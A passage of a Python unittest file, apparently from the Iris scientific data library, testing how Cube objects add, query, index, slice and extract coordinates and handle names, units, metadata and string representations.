        self.assertEqual(self.cube.coords(), [self.y])
        self.assertEqual(self.cube.dim_coords, (self.y,))
        # Add x
        self.cube.add_dim_coord(self.x, 1)
        self.assertEqual(self.cube.coords(), [self.y, self.x])
        self.assertEqual(self.cube.dim_coords, (self.y, self.x))
        # Cannot add a coord twice
        with self.assertRaises(ValueError):
            self.cube.add_dim_coord(self.y, 0)
        # ... even to cube.aux_coords
        with self.assertRaises(ValueError):
            self.cube.add_aux_coord(self.y, 0)
        # Can't add AuxCoord to dim_coords
        y_other = iris.coords.AuxCoord(np.array([ 2.5, 7.5, 12.5]), long_name='y_other')
        with self.assertRaises(ValueError):
            self.cube.add_dim_coord(y_other, 0)
    def test_add_scalar_coord(self):
        """Scalar coords belong in aux_coords, never in dim_coords."""
        scalar_dim_coord = iris.coords.DimCoord(23, long_name='scalar_dim_coord')
        scalar_aux_coord = iris.coords.AuxCoord(23, long_name='scalar_aux_coord')
        # Scalars cannot be in cube.dim_coords
        with self.assertRaises(TypeError):
            self.cube.add_dim_coord(scalar_dim_coord)
        with self.assertRaises(TypeError):
            self.cube.add_dim_coord(scalar_dim_coord, None)
        with self.assertRaises(ValueError):
            self.cube.add_dim_coord(scalar_dim_coord, [])
        with self.assertRaises(ValueError):
            self.cube.add_dim_coord(scalar_dim_coord, ())
        # Make sure that's still the case for a 0-dimensional cube.
        cube = iris.cube.Cube(666)
        self.assertEqual(cube.ndim, 0)
        with self.assertRaises(TypeError):
            self.cube.add_dim_coord(scalar_dim_coord)
        with self.assertRaises(TypeError):
            self.cube.add_dim_coord(scalar_dim_coord, None)
        with self.assertRaises(ValueError):
            self.cube.add_dim_coord(scalar_dim_coord, [])
        with self.assertRaises(ValueError):
            self.cube.add_dim_coord(scalar_dim_coord, ())
        # Both DimCoord and AuxCoord scalars are accepted as aux coords.
        cube = self.cube.copy()
        cube.add_aux_coord(scalar_dim_coord)
        cube.add_aux_coord(scalar_aux_coord)
        self.assertEqual(set(cube.aux_coords), {scalar_dim_coord, scalar_aux_coord})
        # Various options for dims
        cube = self.cube.copy()
        cube.add_aux_coord(scalar_dim_coord, [])
        self.assertEqual(cube.aux_coords, (scalar_dim_coord,))
        cube = self.cube.copy()
        cube.add_aux_coord(scalar_dim_coord, ())
        self.assertEqual(cube.aux_coords, (scalar_dim_coord,))
        cube = self.cube.copy()
        cube.add_aux_coord(scalar_dim_coord, None)
        self.assertEqual(cube.aux_coords, (scalar_dim_coord,))
        cube = self.cube.copy()
        cube.add_aux_coord(scalar_dim_coord)
        self.assertEqual(cube.aux_coords, (scalar_dim_coord,))
    def test_add_aux_coord(self):
        """Check add_aux_coord accepts both coord classes and validates dims lengths."""
        y_another = iris.coords.DimCoord(np.array([ 2.5, 7.5, 12.5]), long_name='y_another')
        # DimCoords can live in cube.aux_coords
        self.cube.add_aux_coord(y_another, 0)
        self.assertEqual(self.cube.dim_coords, ())
        self.assertEqual(self.cube.coords(), [y_another])
        self.assertEqual(self.cube.aux_coords, (y_another,))
        # AuxCoords in cube.aux_coords
        self.cube.add_aux_coord(self.xy, [0, 1])
        self.assertEqual(self.cube.dim_coords, ())
        self.assertEqual(self.cube.coords(), [y_another, self.xy])
        self.assertEqual(set(self.cube.aux_coords), {y_another, self.xy})
        # Lengths must match up
        cube = self.cube.copy()
        with self.assertRaises(ValueError):
            cube.add_aux_coord(self.xy, [1, 0])
    def test_remove_coord(self):
        """Check coords can be removed by name, one at a time, until none remain."""
        self.cube.add_dim_coord(self.y, 0)
        self.cube.add_dim_coord(self.x, 1)
        self.cube.add_aux_coord(self.xy, (0, 1))
        self.assertEqual(set(self.cube.coords()), {self.y, self.x, self.xy})
        self.cube.remove_coord('xy')
        self.assertEqual(set(self.cube.coords()), {self.y, self.x})
        self.cube.remove_coord('x')
        self.assertEqual(self.cube.coords(), [self.y])
        self.cube.remove_coord('y')
        self.assertEqual(self.cube.coords(), [])
    def test_immutable_dimcoord_dims(self):
        """Check the cube copies dim-coord dims on add, and returns them read-only."""
        # Add DimCoord to dimension 1
        dims = [1]
        self.cube.add_dim_coord(self.x, dims)
        self.assertEqual(self.cube.coord_dims(self.x), (1,))
        # Change dims object
        dims[0] = 0
        # Check the cube is unchanged
        self.assertEqual(self.cube.coord_dims(self.x), (1,))
        # Check coord_dims cannot be changed
        dims = self.cube.coord_dims(self.x)
        with self.assertRaises(TypeError):
            dims[0] = 0
    def test_immutable_auxcoord_dims(self):
        """Check the cube copies aux-coord dims on add, and returns them read-only."""
        # Add AuxCoord to dimensions (0, 1)
        dims = [0, 1]
        self.cube.add_aux_coord(self.xy, dims)
        self.assertEqual(self.cube.coord_dims(self.xy), (0, 1))
        # Change dims object
        dims[0] = 1
        dims[1] = 0
        # Check the cube is unchanged
        self.assertEqual(self.cube.coord_dims(self.xy), (0, 1))
        # Check coord_dims cannot be changed
        dims = self.cube.coord_dims(self.xy)
        with self.assertRaises(TypeError):
            dims[0] = 1
@tests.skip_data
class TestStockCubeStringRepresentations(tests.IrisTest):
    """Check str()/repr() of a stock 4d cube and its slices against reference files."""
    def setUp(self):
        # One realistic 4d cube; each test indexes it down to a lower rank.
        self.cube = iris.tests.stock.realistic_4d()
    def test_4d_str(self):
        self.assertString(str(self.cube))
    def test_4d_repr(self):
        self.assertString(repr(self.cube))
    def test_3d_str(self):
        self.assertString(str(self.cube[0]))
    def test_3d_repr(self):
        self.assertString(repr(self.cube[0]))
    def test_2d_str(self):
        self.assertString(str(self.cube[0, 0]))
    def test_2d_repr(self):
        self.assertString(repr(self.cube[0, 0]))
    def test_1d_str(self):
        self.assertString(str(self.cube[0, 0, 0]))
    def test_1d_repr(self):
        self.assertString(repr(self.cube[0, 0, 0]))
    def test_0d_str(self):
        self.assertString(str(self.cube[0, 0, 0, 0]))
    def test_0d_repr(self):
        self.assertString(repr(self.cube[0, 0, 0, 0]))
@tests.skip_data
class TestCubeStringRepresentations(IrisDotTest):
    """Check cube str/repr/unicode and dot-graph output against reference files."""
    def setUp(self):
        path = tests.get_data_path(('PP', 'simple_pp', 'global.pp'))
        self.cube_2d = iris.load_cube(path)
        # Generate the unicode cube up here now it's used in two tests.
        unicode_str = six.unichr(40960) + u'abcd' + six.unichr(1972)
        self.unicode_cube = iris.tests.stock.simple_1d()
        self.unicode_cube.attributes['source'] = unicode_str
    def test_dot_simple_pp(self):
        # Test dot output of a 2d cube loaded from pp.
        cube = self.cube_2d
        cube.attributes['my_attribute'] = 'foobar'
        self.check_dot(cube, ('file_load', 'global_pp.dot'))
        pt = cube.coord('time')
        # and with custom coord attributes
        pt.attributes['monty'] = 'python'
        pt.attributes['brain'] = 'hurts'
        self.check_dot(cube, ('file_load', 'coord_attributes.dot'))
        del pt.attributes['monty']
        del pt.attributes['brain']
        del cube.attributes['my_attribute']
    # TODO hybrid height and dot output - relationship links
    @tests.skip_data
    def test_dot_4d(self):
        cube = iris.tests.stock.realistic_4d()
        self.check_dot(cube, ('file_load', '4d_pp.dot'))
    @tests.skip_data
    def test_missing_coords(self):
        cube = iris.tests.stock.realistic_4d()
        cube.remove_coord('time')
        cube.remove_coord('model_level_number')
        self.assertString(repr(cube),
                          ('cdm', 'str_repr', 'missing_coords_cube.repr.txt'))
        self.assertString(str(cube),
                          ('cdm', 'str_repr', 'missing_coords_cube.str.txt'))
    @tests.skip_data
    def test_cubelist_string(self):
        cube_list = iris.cube.CubeList([iris.tests.stock.realistic_4d(),
                                        iris.tests.stock.global_pp()])
        self.assertString(str(cube_list), ('cdm', 'str_repr', 'cubelist.__str__.txt'))
        self.assertString(repr(cube_list), ('cdm', 'str_repr', 'cubelist.__repr__.txt'))
    def test_basic_0d_cube(self):
        self.assertString(repr(self.cube_2d[0, 0]),
                          ('cdm', 'str_repr', '0d_cube.__repr__.txt'))
        self.assertString(six.text_type(self.cube_2d[0, 0]),
                          ('cdm', 'str_repr', '0d_cube.__unicode__.txt'))
        self.assertString(str(self.cube_2d[0, 0]),
                          ('cdm', 'str_repr', '0d_cube.__str__.txt'))
    def test_similar_coord(self):
        cube = self.cube_2d.copy()
        lon = cube.coord('longitude')
        lon.attributes['flight'] = '218BX'
        lon.attributes['sensor_id'] = 808
        lon.attributes['status'] = 2
        lon2 = lon.copy()
        lon2.attributes['sensor_id'] = 810
        lon2.attributes['ref'] = 'A8T-22'
        del lon2.attributes['status']
        cube.add_aux_coord(lon2, [1])
        lat = cube.coord('latitude')
        lat2 = lat.copy()
        lat2.attributes['test'] = 'True'
        cube.add_aux_coord(lat2, [0])
        self.assertString(str(cube), ('cdm', 'str_repr', 'similar.__str__.txt'))
    def test_cube_summary_cell_methods(self):
        cube = self.cube_2d.copy()
        # Create a list of values used to create cell methods
        test_values = ((("mean",), (u'longitude', 'latitude'), (u'6 minutes', '12 minutes'), (u'This is a test comment',)),
                       (("average",), (u'longitude', 'latitude'), (u'6 minutes', '15 minutes'), (u'This is another test comment', 'This is another comment')),
                       (("average",), (u'longitude', 'latitude'), (), ()),
                       (("percentile",), (u'longitude',), (u'6 minutes',), (u'This is another test comment',)))
        for x in test_values:
            # Create a cell method
            cm = iris.coords.CellMethod(method=x[0][0], coords=x[1], intervals=x[2], comments=x[3])
            cube.add_cell_method(cm)
        self.assertString(str(cube), ('cdm', 'str_repr', 'cell_methods.__str__.txt'))
    def test_cube_summary_alignment(self):
        # Test the cube summary dimension alignment and coord name clipping
        cube = iris.tests.stock.simple_1d()
        aux = iris.coords.AuxCoord(
            np.arange(11),
            long_name='This is a really, really, really, really long '
                      'long_name that must be clipped because it is too long')
        cube.add_aux_coord(aux, 0)
        aux = iris.coords.AuxCoord(np.arange(11),
                                   long_name='This is a short long_name')
        cube.add_aux_coord(aux, 0)
        self.assertString(str(cube), ('cdm', 'str_repr', 'simple.__str__.txt'))
    @contextmanager
    def unicode_encoding_change(self, new_encoding):
        """Temporarily change the (Python 2 only) system default encoding.

        Bug fix: the restore step previously ran after a bare ``yield``, so an
        exception in the managed block left the process encoding changed and
        ``sys.setdefaultencoding`` still exposed.  Use try/finally to guarantee
        restoration.
        """
        default_encoding = sys.getdefaultencoding()
        # reload() restores the setdefaultencoding attribute that site.py deletes.
        reload(sys).setdefaultencoding(new_encoding)
        try:
            yield
        finally:
            sys.setdefaultencoding(default_encoding)
            del sys.setdefaultencoding
    @unittest.skipIf(six.PY3, 'Encodings are sane in Python 3.')
    def test_adjusted_default_encoding(self):
        # Test cube str representation on non-system-default encodings.
        # Doing this requires access to a sys method that is removed by default
        # so reload sys to restore access.
        # Note this does not currently work with utf-16 or utf-32.
        # Run assertions inside 'with' statement to ensure test file is
        # accurately re-created.
        with self.unicode_encoding_change('utf-8'):
            self.assertString(str(self.unicode_cube),
                              ('cdm', 'str_repr',
                               'unicode_attribute.__str__.utf8.txt'))
        with self.unicode_encoding_change('ascii'):
            self.assertString(str(self.unicode_cube),
                              ('cdm', 'str_repr',
                               'unicode_attribute.__str__.ascii.txt'))
    def test_unicode_attribute(self):
        self.assertString(
            six.text_type(self.unicode_cube),
            ('cdm', 'str_repr', 'unicode_attribute.__unicode__.txt'))
@tests.skip_data
class TestValidity(tests.IrisTest):
    """Check that adding badly-sized or badly-placed coords raises ValueError."""
    def setUp(self):
        self.cube_2d = iris.load_cube(tests.get_data_path(('PP', 'simple_pp', 'global.pp')))
    def test_wrong_length_vector_coord(self):
        # A 2-point coord cannot describe the cube's dimension 0.
        wobble = iris.coords.DimCoord(points=[1, 2], long_name='wobble', units='1')
        with self.assertRaises(ValueError):
            self.cube_2d.add_aux_coord(wobble, 0)
    def test_invalid_dimension_vector_coord(self):
        # Dimension 99 does not exist on a 2d cube.
        wobble = iris.coords.DimCoord(points=[1, 2], long_name='wobble', units='1')
        with self.assertRaises(ValueError):
            self.cube_2d.add_dim_coord(wobble, 99)
class TestQueryCoord(tests.IrisTest):
    """Tests for Cube.coords() filtering by name, axis, dimensions and metadata."""
    def setUp(self):
        self.t = iris.tests.stock.simple_2d_w_multidim_and_scalars()
    def test_name(self):
        coords = self.t.coords('dim1')
        self.assertEqual([coord.name() for coord in coords], ['dim1'])
        coords = self.t.coords('dim2')
        self.assertEqual([coord.name() for coord in coords], ['dim2'])
        coords = self.t.coords('an_other')
        self.assertEqual([coord.name() for coord in coords], ['an_other'])
        coords = self.t.coords('air_temperature')
        self.assertEqual([coord.name() for coord in coords], ['air_temperature'])
        coords = self.t.coords('wibble')
        self.assertEqual(coords, [])
    def test_long_name(self):
        # Both standard_name and long_name defined
        coords = self.t.coords(long_name='custom long name')
        # coord.name() returns standard_name if available
        self.assertEqual([coord.name() for coord in coords], ['air_temperature'])
    def test_standard_name(self):
        # Both standard_name and long_name defined
        coords = self.t.coords(standard_name='custom long name')
        self.assertEqual([coord.name() for coord in coords], [])
        coords = self.t.coords(standard_name='air_temperature')
        self.assertEqual([coord.name() for coord in coords], ['air_temperature'])
    def test_var_name(self):
        coords = self.t.coords(var_name='custom_var_name')
        # Matching coord in test cube has a standard_name of 'air_temperature'.
        self.assertEqual([coord.name() for coord in coords], ['air_temperature'])
    def test_axis(self):
        cube = self.t.copy()
        cube.coord("dim1").rename("latitude")
        cube.coord("dim2").rename("longitude")
        coords = cube.coords(axis='y')
        self.assertEqual([coord.name() for coord in coords], ['latitude'])
        coords = cube.coords(axis='x')
        self.assertEqual([coord.name() for coord in coords], ['longitude'])
        # Renaming shouldn't be enough
        cube.coord("an_other").rename("time")
        coords = cube.coords(axis='t')
        self.assertEqual([coord.name() for coord in coords], [])
        # Change units to "hours since ..." as it's the presence of a
        # time unit that identifies a time axis.
        cube.coord("time").units = 'hours since 1970-01-01 00:00:00'
        coords = cube.coords(axis='t')
        self.assertEqual([coord.name() for coord in coords], ['time'])
        coords = cube.coords(axis='z')
        self.assertEqual(coords, [])
    def test_contains_dimension(self):
        coords = self.t.coords(contains_dimension=0)
        self.assertEqual([coord.name() for coord in coords], ['dim1', 'my_multi_dim_coord'])
        coords = self.t.coords(contains_dimension=1)
        self.assertEqual([coord.name() for coord in coords], ['dim2', 'my_multi_dim_coord'])
        coords = self.t.coords(contains_dimension=2)
        self.assertEqual(coords, [])
    def test_dimensions(self):
        coords = self.t.coords(dimensions=0)
        self.assertEqual([coord.name() for coord in coords], ['dim1'])
        coords = self.t.coords(dimensions=1)
        self.assertEqual([coord.name() for coord in coords], ['dim2'])
        # find all coordinates which do not describe a dimension
        coords = self.t.coords(dimensions=[])
        self.assertEqual([coord.name() for coord in coords], ['air_temperature', 'an_other'])
        coords = self.t.coords(dimensions=2)
        self.assertEqual(coords, [])
        coords = self.t.coords(dimensions=[0, 1])
        self.assertEqual([coord.name() for coord in coords], ['my_multi_dim_coord'])
    def test_coord_dim_coords_keyword(self):
        coords = self.t.coords(dim_coords=True)
        self.assertEqual(set([coord.name() for coord in coords]), {'dim1', 'dim2'})
        coords = self.t.coords(dim_coords=False)
        self.assertEqual(set([coord.name() for coord in coords]), {'an_other', 'my_multi_dim_coord', 'air_temperature'})
    def test_coords_empty(self):
        coords = self.t.coords()
        self.assertEqual(set([coord.name() for coord in coords]), {'dim1', 'dim2', 'an_other', 'my_multi_dim_coord', 'air_temperature'})
    def test_coord(self):
        coords = self.t.coords(self.t.coord('dim1'))
        self.assertEqual([coord.name() for coord in coords], ['dim1'])
        # check for metadata look-up by modifying points
        coord = self.t.coord('dim1').copy()
        coord.points = np.arange(5) * 1.23
        coords = self.t.coords(coord)
        self.assertEqual([coord.name() for coord in coords], ['dim1'])
    def test_str_repr(self):
        # TODO consolidate with the TestCubeStringRepresentations class
        self.assertString(str(self.t), ('cdm', 'str_repr', 'multi_dim_coord.__str__.txt'))
        self.assertString(repr(self.t), ('cdm', 'str_repr', 'multi_dim_coord.__repr__.txt'))
class TestCube2d(tests.IrisTest):
    """Shared fixture: a 2d cube (scalar 'air_temperature' coord removed)."""
    def setUp(self):
        self.t = iris.tests.stock.simple_2d_w_multidim_and_scalars()
        self.t.remove_coord('air_temperature')
class Test2dIndexing(TestCube2d):
    """Tests for __getitem__ on a 2d cube, checked against CML reference files."""
    def test_indexing_of_0d_cube(self):
        # A 0d cube cannot be indexed further.
        c = self.t[0, 0]
        self.assertRaises(IndexError, c.__getitem__, (slice(None, None), ) )
    def test_cube_indexing_0d(self):
        self.assertCML([self.t[0, 0]], ('cube_slice', '2d_to_0d_cube_slice.cml'))
    def test_cube_indexing_1d(self):
        self.assertCML([self.t[0, 0:]], ('cube_slice', '2d_to_1d_cube_slice.cml'))
    def test_cube_indexing_1d_multi_slice(self):
        # Tuple and ndarray fancy indices should give identical results.
        self.assertCML([self.t[0, (0, 1)]], ('cube_slice', '2d_to_1d_cube_multi_slice.cml'))
        self.assertCML([self.t[0, np.array([0, 1])]], ('cube_slice', '2d_to_1d_cube_multi_slice.cml'))
    def test_cube_indexing_1d_multi_slice2(self):
        self.assertCML([self.t[(0, 2), (0, 1, 3)]], ('cube_slice', '2d_to_1d_cube_multi_slice2.cml'))
        self.assertCML([self.t[np.array([0, 2]), (0, 1, 3)]], ('cube_slice', '2d_to_1d_cube_multi_slice2.cml'))
        self.assertCML([self.t[np.array([0, 2]), np.array([0, 1, 3])]], ('cube_slice', '2d_to_1d_cube_multi_slice2.cml'))
    def test_cube_indexing_1d_multi_slice3(self):
        self.assertCML([self.t[(0, 2), :]], ('cube_slice', '2d_to_1d_cube_multi_slice3.cml'))
        self.assertCML([self.t[np.array([0, 2]), :]], ('cube_slice', '2d_to_1d_cube_multi_slice3.cml'))
    def test_cube_indexing_no_change(self):
        self.assertCML([self.t[0:, 0:]], ('cube_slice', '2d_orig.cml'))
    def test_cube_indexing_reverse_coords(self):
        self.assertCML([self.t[::-1, ::-1]], ('cube_slice', '2d_to_2d_revesed.cml'))
    def test_cube_indexing_no_residual_change(self):
        # Indexing must not mutate the original cube.
        self.t[0:3]
        self.assertCML([self.t], ('cube_slice', '2d_orig.cml'))
    def test_overspecified(self):
        self.assertRaises(IndexError, self.t.__getitem__, (0, 0, Ellipsis, 0))
        self.assertRaises(IndexError, self.t.__getitem__, (0, 0, 0))
    def test_ellipsis(self):
        self.assertCML([self.t[Ellipsis]], ('cube_slice', '2d_orig.cml'))
        self.assertCML([self.t[:, :, :]], ('cube_slice', '2d_orig.cml'))
        self.assertCML([self.t[Ellipsis, Ellipsis]], ('cube_slice', '2d_orig.cml'))
        self.assertCML([self.t[Ellipsis, Ellipsis, Ellipsis]], ('cube_slice', '2d_orig.cml'))
        self.assertCML([self.t[Ellipsis, 0, 0]], ('cube_slice', '2d_to_0d_cube_slice.cml'))
        self.assertCML([self.t[0, Ellipsis, 0]], ('cube_slice', '2d_to_0d_cube_slice.cml'))
        self.assertCML([self.t[0, 0, Ellipsis]], ('cube_slice', '2d_to_0d_cube_slice.cml'))
        self.assertCML([self.t[Ellipsis, (0, 2), :]], ('cube_slice', '2d_to_1d_cube_multi_slice3.cml'))
        self.assertCML([self.t[(0, 2), Ellipsis, :]], ('cube_slice', '2d_to_1d_cube_multi_slice3.cml'))
        self.assertCML([self.t[(0, 2), :, Ellipsis]], ('cube_slice', '2d_to_1d_cube_multi_slice3.cml'))
class TestIteration(TestCube2d):
    """Check that directly iterating a cube is disallowed."""
    def test_cube_iteration(self):
        # Iteration should raise TypeError; use Cube.slices instead.
        with self.assertRaises(TypeError):
            for subcube in self.t:
                pass
class Test2dSlicing(TestCube2d):
    """Tests for Cube.slices addressed by coordinate name."""
    def test_cube_slice_all_dimensions(self):
        for cube in self.t.slices(['dim1', 'dim2']):
            self.assertCML(cube, ('cube_slice', '2d_orig.cml'))
    def test_cube_slice_with_transpose(self):
        for cube in self.t.slices(['dim2', 'dim1']):
            self.assertCML(cube, ('cube_slice', '2d_transposed.cml'))
    def test_cube_slice_without_transpose(self):
        # ordered=False preserves the cube's own dimension order.
        for cube in self.t.slices(['dim2', 'dim1'], ordered=False):
            self.assertCML(cube, ('cube_slice', '2d_orig.cml'))
    def test_cube_slice_1dimension(self):
        # Result came from the equivalent test test_cube_indexing_1d which
        # does self.t[0, 0:]
        slices = [res for res in self.t.slices(['dim2'])]
        self.assertCML(slices[0], ('cube_slice', '2d_to_1d_cube_slice.cml'))
    def test_cube_slice_zero_len_slice(self):
        self.assertRaises(IndexError, self.t.__getitem__, (slice(0, 0)))
    def test_cube_slice_with_non_existant_coords(self):
        with self.assertRaises(iris.exceptions.CoordinateNotFoundError):
            self.t.slices(['dim2', 'dim1', 'doesnt exist'])
    def test_cube_extract_coord_with_non_describing_coordinates(self):
        # 'an_other' is a scalar coord; it cannot define a slice dimension.
        with self.assertRaises(ValueError):
            self.t.slices(['an_other'])
class Test2dSlicing_ByDim(TestCube2d):
    """Tests for Cube.slices addressed by dimension index."""
    def test_cube_slice_all_dimensions(self):
        for cube in self.t.slices([0, 1]):
            self.assertCML(cube, ('cube_slice', '2d_orig.cml'))
    def test_cube_slice_with_transpose(self):
        for cube in self.t.slices([1, 0]):
            self.assertCML(cube, ('cube_slice', '2d_transposed.cml'))
    def test_cube_slice_without_transpose(self):
        for cube in self.t.slices([1, 0], ordered=False):
            self.assertCML(cube, ('cube_slice', '2d_orig.cml'))
    def test_cube_slice_1dimension(self):
        # Result came from the equivalent test test_cube_indexing_1d which
        # does self.t[0, 0:]
        slices = [res for res in self.t.slices([1])]
        self.assertCML(slices[0], ('cube_slice', '2d_to_1d_cube_slice.cml'))
    def test_cube_slice_nodimension(self):
        # An empty dims list yields 0d slices.
        slices = [res for res in self.t.slices([])]
        self.assertCML(slices[0], ('cube_slice', '2d_to_0d_cube_slice.cml'))
    def test_cube_slice_with_non_existant_dims(self):
        with self.assertRaises(IndexError):
            self.t.slices([1, 0, 2])
    def test_cube_slice_duplicate_dimensions(self):
        with self.assertRaises(ValueError):
            self.t.slices([1, 1])
class Test2dSlicing_ByMix(TestCube2d):
    """Tests for Cube.slices with mixed coord-name / dimension-index arguments."""
    def test_cube_slice_all_dimensions(self):
        for cube in self.t.slices([0, 'dim2']):
            self.assertCML(cube, ('cube_slice', '2d_orig.cml'))
    def test_cube_slice_with_transpose(self):
        for cube in self.t.slices(['dim2', 0]):
            self.assertCML(cube, ('cube_slice', '2d_transposed.cml'))
    def test_cube_slice_with_non_existant_dims(self):
        # 'an_other' is a scalar coord and cannot define a slice dimension.
        with self.assertRaises(ValueError):
            self.t.slices([1, 0, 'an_other'])
class Test2dExtraction(TestCube2d):
    """Tests for Cube.extract with constraints on the 2d fixture cube."""
    def test_cube_extract_0d(self):
        # Extract the first value from each of the coords in the cube
        # this result is shared with the self.t[0, 0] test
        self.assertCML([self.t.extract(iris.Constraint(dim1=3.0, dim2=iris.coords.Cell(0, (0, 1))))], ('cube_slice', '2d_to_0d_cube_slice.cml'))
    def test_cube_extract_1d(self):
        # Extract the first value from the second coord in the cube
        # this result is shared with the self.t[0, 0:] test
        self.assertCML([self.t.extract(iris.Constraint(dim1=3.0))], ('cube_slice', '2d_to_1d_cube_slice.cml'))
    def test_cube_extract_2d(self):
        # Do nothing - return the original
        self.assertCML([self.t.extract(iris.Constraint())], ('cube_slice', '2d_orig.cml'))
    def test_cube_extract_coord_which_does_not_exist(self):
        # assertIsNone (not assertEqual(..., None)) for a clearer failure
        # message, consistent with the rest of this file.
        self.assertIsNone(self.t.extract(iris.Constraint(doesnt_exist=8.1)))
    def test_cube_extract_coord_with_non_existant_values(self):
        self.assertIsNone(self.t.extract(iris.Constraint(dim1=8)))
class Test2dExtractionByCoord(TestCube2d):
    """Tests for Cube.subset with an explicitly-built coordinate."""
    def test_cube_extract_by_coord_advanced(self):
        # This test reverses the coordinate in the cube and also takes a subset of the original coordinate
        points = np.array([9, 8, 7, 5, 4, 3, 2, 1, 0], dtype=np.int32)
        bounds = np.array([[18, 19], [16, 17], [14, 15], [10, 11], [ 8, 9], [ 6, 7], [ 4, 5], [ 2, 3], [ 0, 1]], dtype=np.int32)
        c = iris.coords.DimCoord(points, long_name='dim2', units='meters', bounds=bounds)
        self.assertCML(self.t.subset(c), ('cube_slice', '2d_intersect_and_reverse.cml'))
@tests.skip_data
class TestCubeExtract(tests.IrisTest):
    """Tests for Cube.extract against real loaded PP data."""
    def setUp(self):
        self.single_cube = iris.load_cube(tests.get_data_path(('PP', 'globClim1', 'theta.pp')), 'air_potential_temperature')
    def test_simple(self):
        constraint = iris.Constraint(latitude=10)
        cube = self.single_cube.extract(constraint)
        self.assertCML(cube, ('cdm', 'extract', 'lat_eq_10.cml'))
        constraint = iris.Constraint(latitude=lambda c: c > 10)
        self.assertCML(self.single_cube.extract(constraint), ('cdm', 'extract', 'lat_gt_10.cml'))
    def test_combined(self):
        constraint = iris.Constraint(latitude=lambda c: c > 10, longitude=lambda c: c >= 10)
        self.assertCML(self.single_cube.extract(constraint), ('cdm', 'extract', 'lat_gt_10_and_lon_ge_10.cml'))
    def test_no_results(self):
        constraint = iris.Constraint(latitude=lambda c: c > 1000000)
        # assertIsNone (not assertEqual(..., None)) for a clearer failure
        # message, consistent with the rest of this file.
        self.assertIsNone(self.single_cube.extract(constraint))
class TestCubeAPI(TestCube2d):
    """Tests of the basic Cube metadata API: names, units and the metadata property."""
    def test_getting_standard_name(self):
        self.assertEqual(self.t.name(), 'test 2d dimensional cube')
    def test_rename(self):
        self.t.rename('foo')
        self.assertEqual(self.t.name(), 'foo')
    def test_var_name(self):
        self.t.var_name = None
        # assertIsNone rather than assertEqual(..., None), consistent with
        # the other None checks in this class.
        self.assertIsNone(self.t.var_name)
        self.t.var_name = 'bar'
        self.assertEqual(self.t.var_name, 'bar')
    def test_name_and_var_name(self):
        # Assign only var_name.
        self.t.standard_name = None
        self.t.long_name = None
        self.t.var_name = 'foo'
        # name() should return var_name if standard_name and
        # long_name are None.
        self.assertEqual(self.t.name(), 'foo')
    def test_rename_and_var_name(self):
        self.t.var_name = 'bar'
        self.t.rename('foo')
        # Rename should clear var_name.
        self.assertIsNone(self.t.var_name)
    def test_setting_invalid_var_name(self):
        # Name with whitespace should raise an exception.
        with self.assertRaises(ValueError):
            self.t.var_name = 'foo bar'
    def test_setting_empty_var_name(self):
        # Empty string should raise an exception.
        with self.assertRaises(ValueError):
            self.t.var_name = ''
    def test_getting_units(self):
        self.assertEqual(self.t.units, cf_units.Unit('meters'))
    def test_setting_units(self):
        self.assertEqual(self.t.units, cf_units.Unit('meters'))
        self.t.units = 'kelvin'
        self.assertEqual(self.t.units, cf_units.Unit('kelvin'))
    def test_clearing_units(self):
        self.t.units = None
        self.assertEqual(str(self.t.units), 'unknown')
    def test_convert_units(self):
        # Set to 'volt'
        self.t.units = cf_units.Unit('volt')
        data = self.t.data.copy()
        # Change to 'kV' - data should be scaled automatically.
        self.t.convert_units('kV')
        self.assertEqual(str(self.t.units), 'kV')
        self.assertArrayAlmostEqual(self.t.data, data / 1000.0)
    def test_coords_are_copies(self):
        self.assertIsNot(self.t.coord('dim1'), self.t.copy().coord('dim1'))
    def test_metadata_nop(self):
        # Re-assigning a cube's own metadata must change nothing.
        self.t.metadata = self.t.metadata
        self.assertIsNone(self.t.standard_name)
        self.assertEqual(self.t.long_name, 'test 2d dimensional cube')
        self.assertIsNone(self.t.var_name)
        self.assertEqual(self.t.units, 'meters')
        self.assertEqual(self.t.attributes, {})
        self.assertEqual(self.t.cell_methods, ())
    def test_metadata_tuple(self):
        metadata = ('air_pressure', 'foo', 'bar', '', {'random': '12'}, ())
        self.t.metadata = metadata
        self.assertEqual(self.t.standard_name, 'air_pressure')
        self.assertEqual(self.t.long_name, 'foo')
        self.assertEqual(self.t.var_name, 'bar')
        self.assertEqual(self.t.units, '')
        self.assertEqual(self.t.attributes, metadata[4])
        # The attributes dict must be copied, not shared.
        self.assertIsNot(self.t.attributes, metadata[4])
        self.assertEqual(self.t.cell_methods, ())
    def test_metadata_dict(self):
        metadata = {'standard_name': 'air_pressure',
                    'long_name': 'foo',
                    'var_name': 'bar',
                    'units': '',
                    'attributes': {'random': '12'},
                    'cell_methods': ()}
        self.t.metadata = metadata
        self.assertEqual(self.t.standard_name, 'air_pressure')
        self.assertEqual(self.t.long_name, 'foo')
        self.assertEqual(self.t.var_name, 'bar')
        self.assertEqual(self.t.units, '')
        self.assertEqual(self.t.attributes, metadata['attributes'])
        self.assertIsNot(self.t.attributes, metadata['attributes'])
        self.assertEqual(self.t.cell_methods, ())
    def test_metadata_attrs(self):
        # Any object exposing the right attributes is acceptable metadata.
        class Metadata(object): pass
        metadata = Metadata()
        metadata.standard_name = 'air_pressure'
        metadata.long_name = 'foo'
        metadata.var_name = 'bar'
        metadata.units = ''
        metadata.attributes = {'random': '12'}
        metadata.cell_methods = ()
        metadata.cell_measures_and_dims = []
        self.t.metadata = metadata
        self.assertEqual(self.t.standard_name, 'air_pressure')
        self.assertEqual(self.t.long_name, 'foo')
        self.assertEqual(self.t.var_name, 'bar')
        self.assertEqual(self.t.units, '')
        self.assertEqual(self.t.attributes, metadata.attributes)
        self.assertIsNot(self.t.attributes, metadata.attributes)
        self.assertEqual(self.t.cell_methods, ())
        self.assertEqual(self.t._cell_measures_and_dims, [])
    def test_metadata_fail(self):
        # Wrong-length tuples and incomplete dicts/objects must be rejected.
        with self.assertRaises(TypeError):
            self.t.metadata = ('air_pressure', 'foo', 'bar', '', {'random': '12'})
        with self.assertRaises(TypeError):
            self.t.metadata = ('air_pressure', 'foo', 'bar', '', {'random': '12'}, (), [], (), ())
        with self.assertRaises(TypeError):
            self.t.metadata = {'standard_name': 'air_pressure',
                               'long_name': 'foo',
                               'var_name': 'bar',
                               'units': '',
                               'attributes': {'random': '12'}}
        with self.assertRaises(TypeError):
            class Metadata(object): pass
            metadata = Metadata()
            metadata.standard_name = 'air_pressure'
            metadata.long_name = 'foo'
            metadata.var_name = 'bar'
            metadata.units = ''
            metadata.attributes = {'random': '12'}
